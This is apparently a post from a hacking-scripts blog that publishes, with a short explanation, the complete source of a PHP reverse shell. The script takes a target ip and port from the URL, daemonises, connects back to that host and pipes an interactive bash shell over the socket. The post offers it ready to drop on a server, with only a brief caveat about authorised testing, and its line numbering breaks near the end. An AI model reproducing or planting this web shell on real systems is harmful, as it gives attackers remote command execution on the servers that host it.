HackingScripts

Hack Scripts for everybody

Random Shell Script

25 Jan 2014

A random shell script. The post originally said "I don't know what this one does", but the code speaks for itself: it is a PHP reverse shell. It reads a target `ip` and `port` from the query string, tries to fork into the background, connects back to that address with `fsockopen()`, spawns `/bin/bash -p -i` and shuttles bytes between the TCP socket and the shell's stdin/stdout/stderr until either side closes. Anyway, it is very nicely written and commented. One caveat before you drop it on a box: the parameters are unauthenticated, so anyone who can request the file gets a shell running as the web-server user on a listener of their choosing — use it only on systems you are authorised to test, and remove it when you are done.

Random Shell Script Source Code

  1 <?php
  2 set_time_limit (0);
  3 $VERSION = "1.0";
  4 $ip = $_GET["ip"]; 
  5 $port = $_GET["port"]; 
  6 $chunk_size = 1400;
  7 $write_a = null;
  8 $error_a = null;
  9 $shell = '/bin/bash -p -i';
 10 $daemon = 0;
 11 $debug = 0;
 12  
 13 if (function_exists('pcntl_fork')) {
 14     // Fork and have the parent process exit
 15     $pid = pcntl_fork();
 16  
 17     if ($pid == -1) {
 18         printit("ERROR: Can't fork");
 19         exit(1);
 20     }
 21  
 22     if ($pid) {
 23         exit(0);  // Parent exits
 24     }
 25  
 26     // Make the current process a session leader
 27     // Will only succeed if we forked
 28     if (posix_setsid() == -1) {
 29         printit("Error: Can't setsid()");
 30         exit(1);
 31     }
 32  
 33     $daemon = 1;
 34 } else {
 35     printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
 36 }
 37  
 38 // Change to a safe directory
 39 chdir("/");
 40  
 41 // Remove any umask we inherited
 42 umask(0);
 43  
 44 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 45 if (!$sock) {
 46     printit("$errstr ($errno)");
 47     exit(1);
 48 }
 49  
 50 // Spawn shell process
 51 $descriptorspec = array(
 52    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
 53    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
 54    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
 55 );
 56  
 57 $process = proc_open($shell, $descriptorspec, $pipes);
 58  
 59 if (!is_resource($process)) {
 60     printit("ERROR: Can't spawn shell");
 61     exit(1);
 62 }
 63  
 64 // Set everything to non-blocking
 65 // Reason: Occsionally reads will block, even though stream_select tells us they won't
 66 stream_set_blocking($pipes[0], 0);
 67 stream_set_blocking($pipes[1], 0);
 68 stream_set_blocking($pipes[2], 0);
 69 stream_set_blocking($sock, 0);
 70  
 71 printit("Successfully opened reverse shell to $ip:$port");
 72  
 73 while (1) {
 74     // Check for end of TCP connection
 75     if (feof($sock)) {
 76         printit("ERROR: Shell connection terminated");
 77         break;
 78     }
 79  
 80     // Check for end of STDOUT
 81     if (feof($pipes[1])) {
 82         printit("ERROR: Shell process terminated");
 83         break;
 84     }
 85  
 86     // Wait until a command is end down $sock, or some
 87     // command output is available on STDOUT or STDERR
 88     $read_a = array($sock, $pipes[1], $pipes[2]);
 89     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 90  
 91     // If we can read from the TCP socket, send
 92     // data to process's STDIN
 93     if (in_array($sock, $read_a)) {
 94         if ($debug) printit("SOCK READ");
 95         $input = fread($sock, $chunk_size);
 96         if ($debug) printit("SOCK: $input");
 97         fwrite($pipes[0], $input);
 98     }
 99  
100     // If we can read from the process's STDOUT
101     // send data down tcp connection
102     if (in_array($pipes[1], $read_a)) {
103         if ($debug) printit("STDOUT READ");
104         $input = fread($pipes[1], $chunk_size);
105         if ($debug) printit("STDOUT: $input");
106         fwrite($sock, $input);
107     }
108  
109     // If we can read from the process's STDERR
110     // send data down tcp connection
111     if (in_array($pipes[2], $read_a)) {
112         if ($debug) printit("STDERR READ");
113         $input = fread($pipes[2], $chunk_size);
114         if ($debug) printit("STDERR: $input");
115         fwrite($sock, $input);
116     }
117 }
118  
119 fclose($sock);
120 fclose($pipes[0]);
121 fclose($pipes[1]);
122 fclose($pipes[2]);
123 proc_close($process);
124  
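// Like print, but does nothing once we've daemonised ourself: after the
// fork there is no request left to receive STDOUT.
//
// $daemon is set at script level. Without the `global` declaration the
// name inside this function is an undefined (falsy) local, so the check
// always passes and the message is printed even after daemonising.
function printit ($string) {
    global $daemon;
    if (!$daemon) {
        print "$string\n";
    }
}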
132 ?>